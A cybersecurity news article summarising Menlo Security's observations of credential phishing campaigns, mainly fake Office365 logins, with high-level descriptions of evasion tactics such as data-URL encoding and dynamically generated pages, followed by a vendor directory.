Credentials Phishing Attacks

In the last month, researchers at Menlo Security has been observing a steady rise in credential phishing attacks. This is a popular attack method where attackers make use of fake login pages or forms to steal credentials of commonly used services in a corporate environment. 

Apart from commonly targeted cloud services like Office 365, Amazon Prime, Adobe and others, Menlo also noticed credential phishing attacks impersonating commonly used software services from other countries like South Korea and crypto-currency wallets.  

Office365 Continues To Be The #1  Phishing Target

In the last month, it may not be a surprise to learn that the bulk of the credential phishing attacks were serving fake Outlook and Office365 login pages. This is mostly because of the ubiquity of Office365 service across the corporate sector. Other notable phishing attack incidents included:-

Phishing On Cloud Services:    There is an uptick on the number of phishing pages being hosted on popular cloud services. While services like Azure, One Drive, Box, Firebase, and Dropbox continue to be leveraged to host phishing pages, one interesting addition to this list we came across last month was a phishing page hosted on the popular note taking app Evernote

Phishing Tactics:    Attackers are always trying to come up with tactics to bypass detection solutions. Below, we describe a few common tactics that are actively being used to serve phishing content.  

Use of Data URLs/Encoding To Mask Content:   In a specific phishing HTML page content, we observed usage of Data-URLs to:

  • Hide the actual java-script code that posts credentials to a remote URL. 
  • Encode and embed all custom CSS/Images on the page itself

The advantages of using this mechanism is as follows:

  • Allows the entire phishing page content to be rendered on a browser in a single load within the client. 
  • Adding the “Content-Encoding: gzip” header allows the server to send the compressed response. 
  • There would be no additional resource requests (Javascript/CSS/Images etc). 
  • This is an attempt to evade solutions that rely on the “Content-Type” header to determine resources like Javascript/CSS. 

Dynamic Content Generation:  One interesting tactic that was observed with an Office365 phishing campaign: this campaign seems to be appending the user’s email address on the URL,  the phishing page path is dynamically generated, and the user’s email address is automatically filled.

Conclusion

Cyber criminals are trying to add complexity in order to carry out phishing campaigns that steal sensitive information. With free services like Let’s Encrypt, it’s becoming increasingly easier for attackers to host phishing sites behind SSL with a relatively short TTL for maximum hit rate. 

Increasing cyber security awareness through training and education initiatives is very helpful in reducing the impact of credential phishing attacks, but corporate users should always be cautious when a site presents a form that asks for personal or sensitive information.

Menlo Security:      

You Might Also Read:

Every Employee Should Be Considered A Target:

 

 

« Half A Billion LinkedIn Members Found For Sale
The Future Of Blockchain In Cyber Security »

CyberSecurity Jobsite
Perimeter 81

Directory of Suppliers

Jooble

Jooble

Jooble is a job search aggregator operating in 71 countries worldwide. We simplify the job search process by displaying active job ads from major job boards and career sites across the internet.

BackupVault

BackupVault

BackupVault is a leading provider of automatic cloud backup and critical data protection against ransomware, insider attacks and hackers for businesses and organisations worldwide.

The PC Support Group

The PC Support Group

A partnership with The PC Support Group delivers improved productivity, reduced costs and protects your business through exceptional IT, telecoms and cybersecurity services.

Clayden Law

Clayden Law

Clayden Law advise global businesses that buy and sell technology products and services. We are experts in information technology, data privacy and cybersecurity law.

Syxsense

Syxsense

Syxsense brings together endpoint management and security for greater efficiency and collaboration between IT management and security teams.

Pyramid Computer

Pyramid Computer

Pyramid Computer provides custom enterprise solutions for Industrial PC, Imaging, Network, Security, POS, Indoor Positioning and Automation.

Bastille

Bastille

Bastille’s patented software and security sensors bring visibility to devices emitting radio signals (Wi-Fi, cellular, IoT) in your organization.

Ahope

Ahope

Ahope is a mobile security solution provider in Korea with a long history of security solution development.

Baffle

Baffle

Baffle is pioneering a solution that makes data breaches irrelevant by keeping data encrypted from production through processing.

BetterCloud

BetterCloud

BetterCloud puts IT in control of the modern workplace through user lifecycle management, data discovery, and IT and security automation purpose-built for SaaS.

Futurex

Futurex

Futurex is a globally recognized provider of enterprise-class data encryption solutions.

Data Security Inc

Data Security Inc

Data Security, Inc. is the leading American manufacturer and supplier of hard drive degaussers, magnetic tape degaussers as well as hard drive and solid state destruction devices.

Crosspring

Crosspring

Crosspring is an incubator/accelerator for people who have the ambition to start a successful business or want to extend their existing business in the areas of FinTech, AR, VR, Cybersecurity and SaaS

Dell Technologies Capital

Dell Technologies Capital

At Dell Technologies Capital we lead investment in disruptive, early-stage startups in enterprise and cloud infrastructure.

Data Privacy Office (DPO)

Data Privacy Office (DPO)

Data Privacy Office is a company that specializes in privacy and personal data protection, following the highest standards in its sector.

Pulsant

Pulsant

Pulsant is the UK’s premier digital edge infrastructure company providing next-generation cloud, colocation and connectivity services.

Knownsec

Knownsec

Knownsec provides customers with cloud defense, cloud monitoring, and cloud mapping products and services with "AI + security big data" as the underlying capability.

FutureRange

FutureRange

Specialising in IT Managed Services, Cybersecurity and Digital Transformation, FutureRange experts provide professional IT services for clients throughout Ireland and beyond.

Irys Technologies

Irys Technologies

Irys Technologies specialize in pioneering digital transformation solutions designed to streamline communications and enhance maintenance and operational efficiency for a variety of sectors.

Bluerydge

Bluerydge

Bluerydge specialises in cyber security and technology, focusing on the delivery of innovative sovereign solutions through trusted, cleared and experienced professionals.

SplxAI

SplxAI

Our mission at SplxAI is to secure and safeguard GenAI-powered conversational apps by providing advanced security and pentesting solutions, so neither your organization nor your user base get harmed.